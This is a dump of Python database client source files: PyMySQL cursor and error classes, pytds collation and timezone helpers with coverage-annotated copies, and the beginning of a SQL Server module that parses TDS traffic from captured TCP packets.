51 | def close(self): 52 | ''' 53 | Closing a cursor just exhausts all remaining data. 54 | ''' 55 | conn = self.connection 56 | if conn is None: 57 | return 58 | try: 59 | while self.nextset(): 60 | pass 61 | finally: 62 | self.connection = None 63 | 64 | def _get_db(self): 65 | if not self.connection: 66 | raise ProgrammingError("Cursor closed") 67 | return self.connection 68 | 69 | def _check_executed(self): 70 | if not self._executed: 71 | raise ProgrammingError("execute() first") 72 | 73 | def _conv_row(self, row): 74 | return row 75 | 76 | def setinputsizes(self, *args): 77 | """Does nothing, required by DB API.""" 78 | 79 | def setoutputsizes(self, *args): 80 | """Does nothing, required by DB API.""" 81 | 82 | def _nextset(self, unbuffered=False): 83 | """Get the next query set""" 84 | conn = self._get_db() 85 | current_result = self._result 86 | if current_result is None or current_result is not conn._result: 87 | return None 88 | if not current_result.has_next: 89 | return None 90 | conn.next_result(unbuffered=unbuffered) 91 | self._do_get_result() 92 | return True 93 | 94 | def nextset(self): 95 | return self._nextset(False) 96 | 97 | def _escape_args(self, args, conn): 98 | if isinstance(args, (tuple, list)): 99 | return tuple(conn.escape(arg) for arg in args) 100 | elif isinstance(args, dict): 101 | return dict((key, conn.escape(val)) for (key, val) in args.items()) 102 | else: 103 | #If it's not a dictionary let's try escaping it anyways. 104 | #Worst case it will throw a Value error 105 | return conn.escape(args) 106 | 107 | def execute(self, query, args=None): 108 | '''Execute a query''' 109 | conn = self._get_db() 110 | 111 | while self.nextset(): 112 | pass 113 | 114 | if PY2: # Use bytes on Python 2 always 115 | encoding = conn.encoding 116 | 117 | def ensure_bytes(x): 118 | if isinstance(x, unicode): 119 | x = x.encode(encoding) 120 | return x 121 | 122 | query = ensure_bytes(query) 123 | 124 | if args is not None: 125 | if isinstance(args, (tuple, list)): 126 | args = tuple(map(ensure_bytes, args)) 127 | elif isinstance(args, dict): 128 | args = dict((ensure_bytes(key), ensure_bytes(val)) for (key, val) in args.items()) 129 | else: 130 | args = ensure_bytes(args) 131 | 132 | if args is not None: 133 | query = query % self._escape_args(args, conn) 134 | 135 | result = self._query(query) 136 | self._executed = query 137 | return result 138 | 139 | def executemany(self, query, args): 140 | """Run several data against one query 141 | 142 | PyMySQL can execute bulkinsert for query like 'INSERT ... VALUES (%s)'. 143 | In other form of queries, just run :meth:`execute` many times. 144 | """ 145 | if not args: 146 | return 147 | 148 | m = RE_INSERT_VALUES.match(query) 149 | if m: 150 | q_values = m.group(1).rstrip() 151 | assert q_values[0] == '(' and q_values[-1] == ')' 152 | q_prefix = query[:m.start(1)] 153 | return self._do_execute_many(q_prefix, q_values, args, 154 | self.max_stmt_length, 155 | self._get_db().encoding) 156 | 157 | self.rowcount = sum(self.execute(query, arg) for arg in args) 158 | return self.rowcount 159 | 160 | def _do_execute_many(self, prefix, values, args, max_stmt_length, encoding): 161 | conn = self._get_db() 162 | escape = self._escape_args 163 | if isinstance(prefix, text_type): 164 | prefix = prefix.encode(encoding) 165 | sql = bytearray(prefix) 166 | args = iter(args) 167 | v = values % escape(next(args), conn) 168 | if isinstance(v, text_type): 169 | v = v.encode(encoding) 170 | sql += v 171 | rows = 0 172 | for arg in args: 173 | v = values % escape(arg, conn) 174 | if isinstance(v, text_type): 175 | v = v.encode(encoding) 176 | if len(sql) + len(v) + 1 > max_stmt_length: 177 | rows += self.execute(sql) 178 | sql = bytearray(prefix) 179 | else: 180 | sql += b',' 181 | sql += v 182 | rows += self.execute(sql) 183 | self.rowcount = rows 184 | return rows 185 | 186 | def callproc(self, procname, args=()): 187 | """Execute stored procedure procname with args 188 | 189 | procname -- string, name of procedure to execute on server 190 | 191 | args -- Sequence of parameters to use with procedure 192 | 193 | Returns the original args. 194 | 195 | Compatibility warning: PEP-249 specifies that any modified 196 | parameters must be returned. This is currently impossible 197 | as they are only available by storing them in a server 198 | variable and then retrieved by a query. Since stored 199 | procedures return zero or more result sets, there is no 200 | reliable way to get at OUT or INOUT parameters via callproc. 201 | The server variables are named @_procname_n, where procname 202 | is the parameter above and n is the position of the parameter 203 | (from zero). Once all result sets generated by the procedure 204 | have been fetched, you can issue a SELECT @_procname_0, ... 205 | query using .execute() to get any OUT or INOUT values. 206 | 207 | Compatibility warning: The act of calling a stored procedure 208 | itself creates an empty result set. This appears after any 209 | result sets generated by the procedure. This is non-standard 210 | behavior with respect to the DB-API. Be sure to use nextset() 211 | to advance through all result sets; otherwise you may get 212 | disconnected. 213 | """ 214 | conn = self._get_db() 215 | for index, arg in enumerate(args): 216 | q = "SET @_%s_%d=%s" % (procname, index, conn.escape(arg)) 217 | self._query(q) 218 | self.nextset() 219 | 220 | q = "CALL %s(%s)" % (procname, 221 | ','.join(['@_%s_%d' % (procname, i) 222 | for i in range_type(len(args))])) 223 | self._query(q) 224 | self._executed = q 225 | return args 226 | 227 | def fetchone(self): 228 | ''' Fetch the next row ''' 229 | self._check_executed() 230 | if self._rows is None or self.rownumber >= len(self._rows): 231 | return None 232 | result = self._rows[self.rownumber] 233 | self.rownumber += 1 234 | return result 235 | 236 | def fetchmany(self, size=None): 237 | ''' Fetch several rows ''' 238 | self._check_executed() 239 | if self._rows is None: 240 | return None 241 | end = self.rownumber + (size or self.arraysize) 242 | result = self._rows[self.rownumber:end] 243 | self.rownumber = min(end, len(self._rows)) 244 | return result 245 | 246 | def fetchall(self): 247 | ''' Fetch all the rows ''' 248 | self._check_executed() 249 | if self._rows is None: 250 | return None 251 | if self.rownumber: 252 | result = self._rows[self.rownumber:] 253 | else: 254 | result = self._rows 255 | self.rownumber = len(self._rows) 256 | return result 257 | 258 | def scroll(self, value, mode='relative'): 259 | self._check_executed() 260 | if mode == 'relative': 261 | r = self.rownumber + value 262 | elif mode == 'absolute': 263 | r = value 264 | else: 265 | raise ProgrammingError("unknown scroll mode %s" % mode) 266 | 267 | if not (0 <= r < len(self._rows)): 268 | raise IndexError("out of range") 269 | self.rownumber = r 270 | 271 | def _query(self, q): 272 | conn = self._get_db() 273 | self._last_executed = q 274 | conn.query(q) 275 | self._do_get_result() 276 | return self.rowcount 277 | 278 | def _do_get_result(self): 279 | conn = self._get_db() 280 | 281 | self.rownumber = 0 282 | self._result = result = conn._result 283 | 284 | self.rowcount = result.affected_rows 285 | self.description = result.description 286 | self.lastrowid = result.insert_id 287 | self._rows = result.rows 288 | 289 | def __iter__(self): 290 | return iter(self.fetchone, None) 291 | 292 | Warning = Warning 293 | Error = Error 294 | InterfaceError = InterfaceError 295 | DatabaseError = DatabaseError 296 | DataError = DataError 297 | OperationalError = OperationalError 298 | IntegrityError = IntegrityError 299 | InternalError = InternalError 300 | ProgrammingError = ProgrammingError 301 | NotSupportedError = NotSupportedError 302 | 303 | 304 | class DictCursorMixin(object): 305 | # You can override this to use OrderedDict or other dict-like types. 306 | dict_type = dict 307 | 308 | def _do_get_result(self): 309 | super(DictCursorMixin, self)._do_get_result() 310 | fields = [] 311 | if self.description: 312 | for f in self._result.fields: 313 | name = f.name 314 | if name in fields: 315 | name = f.table_name + '.' + name 316 | fields.append(name) 317 | self._fields = fields 318 | 319 | if fields and self._rows: 320 | self._rows = [self._conv_row(r) for r in self._rows] 321 | 322 | def _conv_row(self, row): 323 | if row is None: 324 | return None 325 | return self.dict_type(zip(self._fields, row)) 326 | 327 | 328 | class DictCursor(DictCursorMixin, Cursor): 329 | """A cursor which returns results as a dictionary""" 330 | 331 | 332 | class SSCursor(Cursor): 333 | """ 334 | Unbuffered Cursor, mainly useful for queries that return a lot of data, 335 | or for connections to remote servers over a slow network. 336 | 337 | Instead of copying every row of data into a buffer, this will fetch 338 | rows as needed. The upside of this, is the client uses much less memory, 339 | and rows are returned much faster when traveling over a slow network, 340 | or if the result set is very big. 341 | 342 | There are limitations, though. The MySQL protocol doesn't support 343 | returning the total number of rows, so the only way to tell how many rows 344 | there are is to iterate over every row returned. Also, it currently isn't 345 | possible to scroll backwards, as only the current row is held in memory. 346 | """ 347 | 348 | def _conv_row(self, row): 349 | return row 350 | 351 | def close(self): 352 | conn = self.connection 353 | if conn is None: 354 | return 355 | 356 | if self._result is not None and self._result is conn._result: 357 | self._result._finish_unbuffered_query() 358 | 359 | try: 360 | while self.nextset(): 361 | pass 362 | finally: 363 | self.connection = None 364 | 365 | def _query(self, q): 366 | conn = self._get_db() 367 | self._last_executed = q 368 | conn.query(q, unbuffered=True) 369 | self._do_get_result() 370 | return self.rowcount 371 | 372 | def nextset(self): 373 | return self._nextset(unbuffered=True) 374 | 375 | def read_next(self): 376 | """ Read next row """ 377 | return self._conv_row(self._result._read_rowdata_packet_unbuffered()) 378 | 379 | def fetchone(self): 380 | """ Fetch next row """ 381 | self._check_executed() 382 | row = self.read_next() 383 | if row is None: 384 | return None 385 | self.rownumber += 1 386 | return row 387 | 388 | def fetchall(self): 389 | """ 390 | Fetch all, as per MySQLdb. Pretty useless for large queries, as 391 | it is buffered. See fetchall_unbuffered(), if you want an unbuffered 392 | generator version of this method. 393 | 394 | """ 395 | return list(self.fetchall_unbuffered()) 396 | 397 | def fetchall_unbuffered(self): 398 | """ 399 | Fetch all, implemented as a generator, which isn't to standard, 400 | however, it doesn't make sense to return everything in a list, as that 401 | would use ridiculous memory for large result sets. 402 | """ 403 | return iter(self.fetchone, None) 404 | 405 | def __iter__(self): 406 | return self.fetchall_unbuffered() 407 | 408 | def fetchmany(self, size=None): 409 | """ Fetch many """ 410 | 411 | self._check_executed() 412 | if size is None: 413 | size = self.arraysize 414 | 415 | rows = [] 416 | for i in range_type(size): 417 | row = self.read_next() 418 | if row is None: 419 | break 420 | rows.append(row) 421 | self.rownumber += 1 422 | return rows 423 | 424 | def scroll(self, value, mode='relative'): 425 | self._check_executed() 426 | 427 | if mode == 'relative': 428 | if value < 0: 429 | raise NotSupportedError( 430 | "Backwards scrolling not supported by this cursor") 431 | 432 | for _ in range_type(value): 433 | self.read_next() 434 | self.rownumber += value 435 | elif mode == 'absolute': 436 | if value < self.rownumber: 437 | raise NotSupportedError( 438 | "Backwards scrolling not supported by this cursor") 439 | 440 | end = value - self.rownumber 441 | for _ in range_type(end): 442 | self.read_next() 443 | self.rownumber = value 444 | else: 445 | raise ProgrammingError("unknown scroll mode %s" % mode) 446 | 447 | 448 | class SSDictCursor(DictCursorMixin, SSCursor): 449 | """ An unbuffered cursor, which returns results as a dictionary """ 450 | -------------------------------------------------------------------------------- /databases/pymysql/err.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | from constants import ER 4 | 5 | class MySQLError(Exception): 6 | """Exception related to operation with MySQL.""" 7 | 8 | 9 | class Warning(Warning, MySQLError): 10 | """Exception raised for important warnings like data truncations 11 | while inserting, etc.""" 12 | 13 | class Error(MySQLError): 14 | """Exception that is the base class of all other error exceptions 15 | (not Warning).""" 16 | 17 | 18 | class InterfaceError(Error): 19 | """Exception raised for errors that are related to the database 20 | interface rather than the database itself.""" 21 | 22 | 23 | class DatabaseError(Error): 24 | """Exception raised for errors that are related to the 25 | database.""" 26 | 27 | 28 | class DataError(DatabaseError): 29 | """Exception raised for errors that are due to problems with the 30 | processed data like division by zero, numeric value out of range, 31 | etc.""" 32 | 33 | 34 | class OperationalError(DatabaseError): 35 | """Exception raised for errors that are related to the database's 36 | operation and not necessarily under the control of the programmer, 37 | e.g. an unexpected disconnect occurs, the data source name is not 38 | found, a transaction could not be processed, a memory allocation 39 | error occurred during processing, etc.""" 40 | 41 | 42 | class IntegrityError(DatabaseError): 43 | """Exception raised when the relational integrity of the database 44 | is affected, e.g. a foreign key check fails, duplicate key, 45 | etc.""" 46 | 47 | 48 | class InternalError(DatabaseError): 49 | """Exception raised when the database encounters an internal 50 | error, e.g. the cursor is not valid anymore, the transaction is 51 | out of sync, etc.""" 52 | 53 | 54 | class ProgrammingError(DatabaseError): 55 | """Exception raised for programming errors, e.g. table not found 56 | or already exists, syntax error in the SQL statement, wrong number 57 | of parameters specified, etc.""" 58 | 59 | 60 | class NotSupportedError(DatabaseError): 61 | """Exception raised in case a method or database API was used 62 | which is not supported by the database, e.g. requesting a 63 | .rollback() on a connection that does not support transaction or 64 | has transactions turned off.""" 65 | 66 | 67 | error_map = {} 68 | 69 | def _map_error(exc, *errors): 70 | for error in errors: 71 | error_map[error] = exc 72 | 73 | _map_error(ProgrammingError, ER.DB_CREATE_EXISTS, ER.SYNTAX_ERROR, 74 | ER.PARSE_ERROR, ER.NO_SUCH_TABLE, ER.WRONG_DB_NAME, 75 | ER.WRONG_TABLE_NAME, ER.FIELD_SPECIFIED_TWICE, 76 | ER.INVALID_GROUP_FUNC_USE, ER.UNSUPPORTED_EXTENSION, 77 | ER.TABLE_MUST_HAVE_COLUMNS, ER.CANT_DO_THIS_DURING_AN_TRANSACTION) 78 | _map_error(DataError, ER.WARN_DATA_TRUNCATED, ER.WARN_NULL_TO_NOTNULL, 79 | ER.WARN_DATA_OUT_OF_RANGE, ER.NO_DEFAULT, ER.PRIMARY_CANT_HAVE_NULL, 80 | ER.DATA_TOO_LONG, ER.DATETIME_FUNCTION_OVERFLOW) 81 | _map_error(IntegrityError, ER.DUP_ENTRY, ER.NO_REFERENCED_ROW, 82 | ER.NO_REFERENCED_ROW_2, ER.ROW_IS_REFERENCED, ER.ROW_IS_REFERENCED_2, 83 | ER.CANNOT_ADD_FOREIGN, ER.BAD_NULL_ERROR) 84 | _map_error(NotSupportedError, ER.WARNING_NOT_COMPLETE_ROLLBACK, 85 | ER.NOT_SUPPORTED_YET, ER.FEATURE_DISABLED, ER.UNKNOWN_STORAGE_ENGINE) 86 | _map_error(OperationalError, ER.DBACCESS_DENIED_ERROR, ER.ACCESS_DENIED_ERROR, 87 | ER.CON_COUNT_ERROR, ER.TABLEACCESS_DENIED_ERROR, 88 | ER.COLUMNACCESS_DENIED_ERROR) 89 | 90 | del _map_error, ER 91 | 92 | 93 | def _get_error_info(data): 94 | errno = struct.unpack('> 26 232 | return cls(lcid=lcid, 233 | ignore_case=ignore_case, 234 | ignore_accent=ignore_accent, 235 | ignore_width=ignore_width, 236 | ignore_kana=ignore_kana, 237 | binary=binary, 238 | binary2=binary2, 239 | version=version, 240 | sort_id=sort_id) 241 | 242 | 1: def pack(self): 243 | lump = 0 244 | lump |= self.lcid & 0xfffff 245 | lump |= (self.version << 26) & 0xf0000000 246 | if self.ignore_case: 247 | lump |= self.f_ignore_case 248 | if self.ignore_accent: 249 | lump |= self.f_ignore_accent 250 | if self.ignore_width: 251 | lump |= self.f_ignore_width 252 | if self.ignore_kana: 253 | lump |= self.f_ignore_kana 254 | if self.binary: 255 | lump |= self.f_binary 256 | if self.binary2: 257 | lump |= self.f_binary2 258 | return self._coll_struct.pack(lump, self.sort_id) 259 | 260 | 1: def get_charset(self): 261 | if self.sort_id: 262 | return sortid2charset(self.sort_id) 263 | else: 264 | return lcid2charset(self.lcid) 265 | 266 | 1: def get_codec(self): 267 | return codecs.lookup(self.get_charset()) 268 | 269 | #TODO: define __repr__ and __unicode__ 270 | 271 | 272 | 1: raw_collation = Collation(0, 0, 0, 0, 0, 0, 0, 0, 0) 273 | -------------------------------------------------------------------------------- /databases/pytds/collate.py: -------------------------------------------------------------------------------- 1 | import codecs 2 | import struct 3 | 4 | TDS_CHARSET_ISO_8859_1 = 1 5 | TDS_CHARSET_CP1251 = 2 6 | TDS_CHARSET_CP1252 = 3 7 | TDS_CHARSET_UCS_2LE = 4 8 | 9 | TDS_CHARSET_UNICODE = 5 10 | 11 | ucs2_codec = codecs.lookup('utf_16_le') 12 | 13 | 14 | def sortid2charset(sort_id): 15 | sql_collate = sort_id 16 | # 17 | # The table from the MSQLServer reference "Windows Collation Designators" 18 | # and from " NLS Information for Microsoft Windows XP" 19 | # 20 | if sql_collate in ( 21 | 30, # SQL_Latin1_General_CP437_BIN 22 | 31, # SQL_Latin1_General_CP437_CS_AS 23 | 32, # SQL_Latin1_General_CP437_CI_AS 24 | 33, # SQL_Latin1_General_Pref_CP437_CI_AS 25 | 34): # SQL_Latin1_General_CP437_CI_AI 26 | return 'CP437' 27 | elif sql_collate in ( 28 | 40, # SQL_Latin1_General_CP850_BIN 29 | 41, # SQL_Latin1_General_CP850_CS_AS 30 | 42, # SQL_Latin1_General_CP850_CI_AS 31 | 43, # SQL_Latin1_General_Pref_CP850_CI_AS 32 | 44, # SQL_Latin1_General_CP850_CI_AI 33 | 49, # SQL_1xCompat_CP850_CI_AS 34 | 55, # SQL_AltDiction_CP850_CS_AS 35 | 56, # SQL_AltDiction_Pref_CP850_CI_AS 36 | 57, # SQL_AltDiction_CP850_CI_AI 37 | 58, # SQL_Scandinavian_Pref_CP850_CI_AS 38 | 59, # SQL_Scandinavian_CP850_CS_AS 39 | 60, # SQL_Scandinavian_CP850_CI_AS 40 | 61): # SQL_AltDiction_CP850_CI_AS 41 | return 'CP850' 42 | elif sql_collate in ( 43 | 80, # SQL_Latin1_General_1250_BIN 44 | 81, # SQL_Latin1_General_CP1250_CS_AS 45 | 82, # SQL_Latin1_General_Cp1250_CI_AS_KI_WI 46 | 83, # SQL_Czech_Cp1250_CS_AS_KI_WI 47 | 84, # SQL_Czech_Cp1250_CI_AS_KI_WI 48 | 85, # SQL_Hungarian_Cp1250_CS_AS_KI_WI 49 | 86, # SQL_Hungarian_Cp1250_CI_AS_KI_WI 50 | 87, # SQL_Polish_Cp1250_CS_AS_KI_WI 51 | 88, # SQL_Polish_Cp1250_CI_AS_KI_WI 52 | 89, # SQL_Romanian_Cp1250_CS_AS_KI_WI 53 | 90, # SQL_Romanian_Cp1250_CI_AS_KI_WI 54 | 91, # SQL_Croatian_Cp1250_CS_AS_KI_WI 55 | 92, # SQL_Croatian_Cp1250_CI_AS_KI_WI 56 | 93, # SQL_Slovak_Cp1250_CS_AS_KI_WI 57 | 94, # SQL_Slovak_Cp1250_CI_AS_KI_WI 58 | 95, # SQL_Slovenian_Cp1250_CS_AS_KI_WI 59 | 96, # SQL_Slovenian_Cp1250_CI_AS_KI_WI 60 | ): 61 | return 'CP1250' 62 | elif sql_collate in ( 63 | 104, # SQL_Latin1_General_1251_BIN 64 | 105, # SQL_Latin1_General_CP1251_CS_AS 65 | 106, # SQL_Latin1_General_CP1251_CI_AS 66 | 107, # SQL_Ukrainian_Cp1251_CS_AS_KI_WI 67 | 108, # SQL_Ukrainian_Cp1251_CI_AS_KI_WI 68 | ): 69 | return 'CP1251' 70 | elif sql_collate in ( 71 | 51, # SQL_Latin1_General_Cp1_CS_AS_KI_WI 72 | 52, # SQL_Latin1_General_Cp1_CI_AS_KI_WI 73 | 53, # SQL_Latin1_General_Pref_Cp1_CI_AS_KI_WI 74 | 54, # SQL_Latin1_General_Cp1_CI_AI_KI_WI 75 | 183, # SQL_Danish_Pref_Cp1_CI_AS_KI_WI 76 | 184, # SQL_SwedishPhone_Pref_Cp1_CI_AS_KI_WI 77 | 185, # SQL_SwedishStd_Pref_Cp1_CI_AS_KI_WI 78 | 186, # SQL_Icelandic_Pref_Cp1_CI_AS_KI_WI 79 | ): 80 | return 'CP1252' 81 | elif sql_collate in ( 82 | 112, # SQL_Latin1_General_1253_BIN 83 | 113, # SQL_Latin1_General_CP1253_CS_AS 84 | 114, # SQL_Latin1_General_CP1253_CI_AS 85 | 120, # SQL_MixDiction_CP1253_CS_AS 86 | 121, # SQL_AltDiction_CP1253_CS_AS 87 | 122, # SQL_AltDiction2_CP1253_CS_AS 88 | 124, # SQL_Latin1_General_CP1253_CI_AI 89 | ): 90 | return 'CP1253' 91 | elif sql_collate in ( 92 | 128, # SQL_Latin1_General_1254_BIN 93 | 129, # SQL_Latin1_General_Cp1254_CS_AS_KI_WI 94 | 130, # SQL_Latin1_General_Cp1254_CI_AS_KI_WI 95 | ): 96 | return 'CP1254' 97 | elif sql_collate in ( 98 | 136, # SQL_Latin1_General_1255_BIN 99 | 137, # SQL_Latin1_General_CP1255_CS_AS 100 | 138, # SQL_Latin1_General_CP1255_CI_AS 101 | ): 102 | return 'CP1255' 103 | elif sql_collate in ( 104 | 144, # SQL_Latin1_General_1256_BIN 105 | 145, # SQL_Latin1_General_CP1256_CS_AS 106 | 146, # SQL_Latin1_General_CP1256_CI_AS 107 | ): 108 | return 'CP1256' 109 | elif sql_collate in ( 110 | 152, # SQL_Latin1_General_1257_BIN 111 | 153, # SQL_Latin1_General_CP1257_CS_AS 112 | 154, # SQL_Latin1_General_CP1257_CI_AS 113 | 155, # SQL_Estonian_Cp1257_CS_AS_KI_WI 114 | 156, # SQL_Estonian_Cp1257_CI_AS_KI_WI 115 | 157, # SQL_Latvian_Cp1257_CS_AS_KI_WI 116 | 158, # SQL_Latvian_Cp1257_CI_AS_KI_WI 117 | 159, # SQL_Lithuanian_Cp1257_CS_AS_KI_WI 118 | 160, # SQL_Lithuanian_Cp1257_CI_AS_KI_WI 119 | ): 120 | return 'CP1257' 121 | else: 122 | raise Exception("Invalid collation: 0x%X" % (sql_collate, )) 123 | 124 | 125 | def lcid2charset(lcid): 126 | if lcid in (0x405, 127 | 0x40e, # 0x1040e 128 | 0x415, 0x418, 0x41a, 0x41b, 0x41c, 0x424, 129 | #0x81a, seem wrong in XP table TODO check 130 | 0x104e): 131 | return 'CP1250' 132 | elif lcid in (0x402, 0x419, 0x422, 0x423, 0x42f, 0x43f, 133 | 0x440, 0x444, 0x450, 134 | 0x81a, # ?? 135 | 0x82c, 0x843, 0xc1a): 136 | return 'CP1251' 137 | elif lcid in (0x1007, 0x1009, 0x100a, 0x100c, 0x1407, 138 | 0x1409, 0x140a, 0x140c, 0x1809, 0x180a, 139 | 0x180c, 0x1c09, 0x1c0a, 0x2009, 0x200a, 140 | 0x2409, 0x240a, 0x2809, 0x280a, 0x2c09, 141 | 0x2c0a, 0x3009, 0x300a, 0x3409, 0x340a, 142 | 0x380a, 0x3c0a, 0x400a, 0x403, 0x406, 143 | 0x407, # 0x10407 144 | 0x409, 0x40a, 0x40b, 0x40c, 0x40f, 0x410, 145 | 0x413, 0x414, 0x416, 0x41d, 0x421, 0x42d, 146 | 0x436, 147 | 0x437, # 0x10437 148 | 0x438, 149 | #0x439, ??? Unicode only 150 | 0x43e, 0x440a, 0x441, 0x456, 0x480a, 151 | 0x4c0a, 0x500a, 0x807, 0x809, 0x80a, 152 | 0x80c, 0x810, 0x813, 0x814, 0x816, 153 | 0x81d, 0x83e, 0xc07, 0xc09, 0xc0a, 0xc0c): 154 | return 'CP1252' 155 | elif lcid == 0x408: 156 | return 'CP1253' 157 | elif lcid in (0x41f, 0x42c, 0x443): 158 | return 'CP1254' 159 | elif lcid == 0x40d: 160 | return 'CP1255' 161 | elif lcid in (0x1001, 0x1401, 0x1801, 0x1c01, 0x2001, 162 | 0x2401, 0x2801, 0x2c01, 0x3001, 0x3401, 163 | 0x3801, 0x3c01, 0x4001, 0x401, 0x420, 164 | 0x429, 0x801, 0xc01): 165 | return 'CP1256' 166 | elif lcid in (0x425, 0x426, 0x427, 167 | 0x827): # ?? 168 | return 'CP1257' 169 | elif lcid == 0x42a: 170 | return 'CP1258' 171 | elif lcid == 0x41e: 172 | return 'CP874' 173 | elif lcid == 0x411: # 0x10411 174 | return 'CP932' 175 | elif lcid in (0x1004, 176 | 0x804): # 0x20804 177 | return 'CP936' 178 | elif lcid == 0x412: # 0x10412 179 | return 'CP949' 180 | elif lcid in (0x1404, 181 | 0x404, # 0x30404 182 | 0xc04): 183 | return 'CP950' 184 | else: 185 | return 'CP1252' 186 | 187 | 188 | class Collation(object): 189 | _coll_struct = struct.Struct('> 26 232 | return cls(lcid=lcid, 233 | ignore_case=ignore_case, 234 | ignore_accent=ignore_accent, 235 | ignore_width=ignore_width, 236 | ignore_kana=ignore_kana, 237 | binary=binary, 238 | binary2=binary2, 239 | version=version, 240 | sort_id=sort_id) 241 | 242 | def pack(self): 243 | lump = 0 244 | lump |= self.lcid & 0xfffff 245 | lump |= (self.version << 26) & 0xf0000000 246 | if self.ignore_case: 247 | lump |= self.f_ignore_case 248 | if self.ignore_accent: 249 | lump |= self.f_ignore_accent 250 | if self.ignore_width: 251 | lump |= self.f_ignore_width 252 | if self.ignore_kana: 253 | lump |= self.f_ignore_kana 254 | if self.binary: 255 | lump |= self.f_binary 256 | if self.binary2: 257 | lump |= self.f_binary2 258 | return self._coll_struct.pack(lump, self.sort_id) 259 | 260 | def get_charset(self): 261 | if self.sort_id: 262 | return sortid2charset(self.sort_id) 263 | else: 264 | return lcid2charset(self.lcid) 265 | 266 | def get_codec(self): 267 | return codecs.lookup(self.get_charset()) 268 | 269 | #TODO: define __repr__ and __unicode__ 270 | 271 | 272 | raw_collation = Collation(0, 0, 0, 0, 0, 0, 0, 0, 0) 273 | -------------------------------------------------------------------------------- /databases/pytds/tz.cover: -------------------------------------------------------------------------------- 1 | 1: import time as _time 2 | 1: from datetime import tzinfo, timedelta, datetime 3 | 4 | 1: ZERO = timedelta(0) 5 | 1: HOUR = timedelta(hours=1) 6 | 7 | # A UTC class. 8 | 9 | 2: class UTC(tzinfo): 10 | 1: """UTC""" 11 | 12 | 1: def utcoffset(self, dt): 13 | return ZERO 14 | 15 | 1: def tzname(self, dt): 16 | return "UTC" 17 | 18 | 1: def dst(self, dt): 19 | return ZERO 20 | 21 | 1: utc = UTC() 22 | 23 | # A class building tzinfo objects for fixed-offset time zones. 24 | # Note that FixedOffset(0, "UTC") is a different way to build a 25 | # UTC tzinfo object. 26 | 27 | 2: class FixedOffsetTimezone(tzinfo): 28 | 1: """Fixed offset in minutes east from UTC.""" 29 | 30 | 1: def __init__(self, offset, name=None): 31 | self.__offset = timedelta(minutes=offset) 32 | self.__name = name 33 | 34 | 1: def utcoffset(self, dt): 35 | return self.__offset 36 | 37 | 1: def tzname(self, dt): 38 | return self.__name 39 | 40 | 1: def dst(self, dt): 41 | return ZERO 42 | 43 | 44 | 1: STDOFFSET = timedelta(seconds = -_time.timezone) 45 | 1: if _time.daylight: 46 | 1: DSTOFFSET = timedelta(seconds = -_time.altzone) 47 | else: 48 | DSTOFFSET = STDOFFSET 49 | 50 | 1: DSTDIFF = DSTOFFSET - STDOFFSET 51 | 52 | 2: class LocalTimezone(tzinfo): 53 | 54 | 1: def utcoffset(self, dt): 55 | if self._isdst(dt): 56 | return DSTOFFSET 57 | else: 58 | return STDOFFSET 59 | 60 | 1: def dst(self, dt): 61 | if self._isdst(dt): 62 | return DSTDIFF 63 | else: 64 | return ZERO 65 | 66 | 1: def tzname(self, dt): 67 | return _time.tzname[self._isdst(dt)] 68 | 69 | 1: def _isdst(self, dt): 70 | tt = (dt.year, dt.month, dt.day, 71 | dt.hour, dt.minute, dt.second, 72 | dt.weekday(), 0, 0) 73 | stamp = _time.mktime(tt) 74 | tt = _time.localtime(stamp) 75 | return tt.tm_isdst > 0 76 | 77 | 1: local = LocalTimezone() 78 | -------------------------------------------------------------------------------- /databases/pytds/tz.py: -------------------------------------------------------------------------------- 1 | import time as _time 2 | from datetime import tzinfo, timedelta, datetime 3 | 4 | ZERO = timedelta(0) 5 | HOUR = timedelta(hours=1) 6 | 7 | # A UTC class. 8 | 9 | class UTC(tzinfo): 10 | """UTC""" 11 | 12 | def utcoffset(self, dt): 13 | return ZERO 14 | 15 | def tzname(self, dt): 16 | return "UTC" 17 | 18 | def dst(self, dt): 19 | return ZERO 20 | 21 | utc = UTC() 22 | 23 | # A class building tzinfo objects for fixed-offset time zones. 24 | # Note that FixedOffset(0, "UTC") is a different way to build a 25 | # UTC tzinfo object. 26 | 27 | class FixedOffsetTimezone(tzinfo): 28 | """Fixed offset in minutes east from UTC.""" 29 | 30 | def __init__(self, offset, name=None): 31 | self.__offset = timedelta(minutes=offset) 32 | self.__name = name 33 | 34 | def utcoffset(self, dt): 35 | return self.__offset 36 | 37 | def tzname(self, dt): 38 | return self.__name 39 | 40 | def dst(self, dt): 41 | return ZERO 42 | 43 | 44 | STDOFFSET = timedelta(seconds = -_time.timezone) 45 | if _time.daylight: 46 | DSTOFFSET = timedelta(seconds = -_time.altzone) 47 | else: 48 | DSTOFFSET = STDOFFSET 49 | 50 | DSTDIFF = DSTOFFSET - STDOFFSET 51 | 52 | class LocalTimezone(tzinfo): 53 | 54 | def utcoffset(self, dt): 55 | if self._isdst(dt): 56 | return DSTOFFSET 57 | else: 58 | return STDOFFSET 59 | 60 | def dst(self, dt): 61 | if self._isdst(dt): 62 | return DSTDIFF 63 | else: 64 | return ZERO 65 | 66 | def tzname(self, dt): 67 | return _time.tzname[self._isdst(dt)] 68 | 69 | def _isdst(self, dt): 70 | tt = (dt.year, dt.month, dt.day, 71 | dt.hour, dt.minute, dt.second, 72 | dt.weekday(), 0, 0) 73 | stamp = _time.mktime(tt) 74 | tt = _time.localtime(stamp) 75 | return tt.tm_isdst > 0 76 | 77 | local = LocalTimezone() -------------------------------------------------------------------------------- /databases/sqlserver.py: -------------------------------------------------------------------------------- 1 | import abc,sys,binascii 2 | from basedb import BaseDB 3 | from sys import path 4 | from constantvalues import * 5 | path.append("databases/pytds/") 6 | import tds 7 | 8 | class SqlServerDB(BaseDB): 9 | def __init__(self): 10 | pass 11 | 12 | def encodeQuery(self,query): 13 | return query 14 | 15 | def isDB(self, payload): 16 | return UNKNOWN 17 | 18 | def isReq(self, payloads): 19 | return UNKNOWN 20 | 21 | def isResp(self, payloads): 22 | return UNKNOWN 23 | 24 | def parseReq(self,pkt,conn): 25 | data = str(pkt[TCP])[20:].encode('hex') 26 | return "\n--SQLServ Req--\n%s\n"%self.readable(data) 27 | 28 | def parseResp(self, data, conn): 29 | data = str(pkt[TCP])[20:] 30 | resp = Response(data) 31 | resp.parse() 32 | 33 | if len(resp.messages) > 0: 34 | self.store("--SQLServ Resp--\n%s"%resp.messages[0]['message']) 35 | else: 36 | self.store("--SQLServ Resp--\n%s"%resp.results) 37 | 38 | def validAscii(self,h): 39 | if int(h,16)>31 